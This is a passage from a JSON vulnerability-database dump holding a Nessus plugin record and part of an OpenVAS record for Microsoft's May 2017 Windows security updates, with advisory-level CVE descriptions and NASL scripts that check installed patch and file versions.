improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0223", "CVE-2017-0224", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0235", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_MAY_4016871.NASL", "href": "https://www.tenable.com/plugins/nessus/100055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100055);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0223\",\n \"CVE-2017-0224\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0235\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98214,\n 98217,\n 98222,\n 98229,\n 98230,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98452\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSFT\", value:\"MS17-4016871\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4016871/windows-10-update-kb4016871\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f546dcfb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4016871.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4016871' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4016871))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:22:43", "description": "This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-8552", "CVE-2017-0268", "CVE-2017-0242", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", "CVE-2017-0175"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811114", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019264)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811114\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0175\",\n \"CVE-2017-0190\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\",\n \"CVE-2017-0222\", \"CVE-2017-0231\", \"CVE-2017-0242\", \"CVE-2017-0244\",\n \"CVE-2017-0245\", \"CVE-2017-0246\", \"CVE-2017-0258\", \"CVE-2017-0263\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\", \"CVE-2017-8552\");\n script_bugtraq_id(98121, 98114, 98097, 98110, 98298, 98102, 98103, 98111, 98127,\n 98173, 98275, 98109, 98115, 98108, 98112, 98258, 98259, 98261,\n 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270,\n 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019264)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019264\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp( win7:2, win7x64:2, win2008r2:2 ) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.1.7601.23775\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23775\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": 